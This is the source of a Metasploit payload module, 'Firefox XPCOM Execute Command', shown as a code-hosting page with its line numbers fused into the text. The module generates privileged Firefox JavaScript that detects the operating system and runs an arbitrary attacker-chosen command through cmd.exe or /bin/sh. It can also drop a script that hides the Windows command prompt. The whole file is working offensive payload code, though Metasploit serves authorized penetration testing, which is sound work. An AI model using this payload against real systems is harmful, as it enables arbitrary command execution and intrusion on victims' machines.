Path: blob/master/modules/payloads/singles/firefox/exec.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 101978include Msf::Payload::Single9include Msf::Payload::Firefox1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Firefox XPCOM Execute Command',16'Description' => %q{17This module runs a shell command on the target OS without touching the disk.18On Windows, this command will flash the command prompt momentarily.19This can be avoided by setting WSCRIPT to true, which drops a jscript20"launcher" to disk that hides the prompt.21},22'Author' => ['joev'],23'License' => BSD_LICENSE,24'Platform' => 'firefox',25'Arch' => ARCH_FIREFOX26)27)28register_options([29OptString.new('CMD', [true, 'The command string to execute', 'touch /tmp/a.txt']),30OptBool.new('WSCRIPT', [true, 'On Windows, drop a vbscript to hide the cmd prompt', false])31])32end3334def generate(_opts = {})35<<-EOS3637(function(){38window = this;39#{read_file_source if datastore['WSCRIPT']}40#{run_cmd_source if datastore['WSCRIPT']}4142var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]43.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;44var windows = (ua.indexOf("Windows")>-1);4546var cmd = (#{JSON.unparse({ cmd: datastore['CMD'] })}).cmd;47if (#{datastore['WSCRIPT']} && windows) {48runCmd(cmd);49} else {50var process = Components.classes["@mozilla.org/process/util;1"]51.createInstance(Components.interfaces.nsIProcess);52var sh = Components.classes["@mozilla.org/file/local;1"]53.createInstance(Components.interfaces.nsILocalFile);54var args;55if (windows) {56sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");57args = ["/c", cmd];58} else {59sh.initWithPath("/bin/sh");60args = ["-c", cmd];61}62process.init(sh);63process.run(true, args, args.length);64}65})();6667EOS68end69end707172